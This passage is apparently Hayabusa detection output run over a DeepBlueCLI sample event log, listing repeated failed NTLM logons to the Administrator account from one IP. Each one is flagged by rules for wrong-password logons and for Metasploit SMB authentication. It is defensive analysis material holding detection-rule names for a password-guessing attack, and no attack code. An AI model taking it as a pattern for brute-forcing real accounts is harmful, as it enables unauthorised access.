Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8lCe1shqSs0xNwAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ipZAMvm56d5mE9Fc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XX9N7jodTuEYBCSE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h5DBFGpzfJJ7gYV1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fQ3qTwcWkXJDuXDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TOfkvLSo2HuhMtvk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y9DQUhPQHvvwAO0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yao1JM0tSFv5IHnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.990 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXGm63wiZz3ZYFb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: izvPgZCO2GRVLhId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.077 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iI9zO2o7jd922pfK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnAGy86My6hVwt4J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhFTzONSVEziRtgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdEv4ooC8AApqU1T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxFGRBKVK732Aeu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITg8QH90LKkAQMLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8YKCN2uxmJtYxdW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lcVIqrTQbNLFW7Cr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: taZx68l1ci0i2XB0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Jjy0gZhZCc9dVGd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S1DxOWcNytmxHfxl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGRFWos3MJeQ0oAr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.555 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I3YXVTiQAGbf57TH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eWNsBwoGd36krY2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HIobpWCoOHdD76lL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W91ruUEdXwRcMxVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6PEs7fp97cYFf4vx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQelUX0kwLfpJnr0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.781 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t88CBspQqbiO1IPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zELW2Upo3jRCIqJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfcyJGLYmu93JBIL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3t2nKPZHZvcXM3QA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oiDRonqdEM2YJvz9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wJPF4GUypkDkTz56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cd5YRVIoXx8LoYpK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H49I2Xp2Gz1Jj0Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 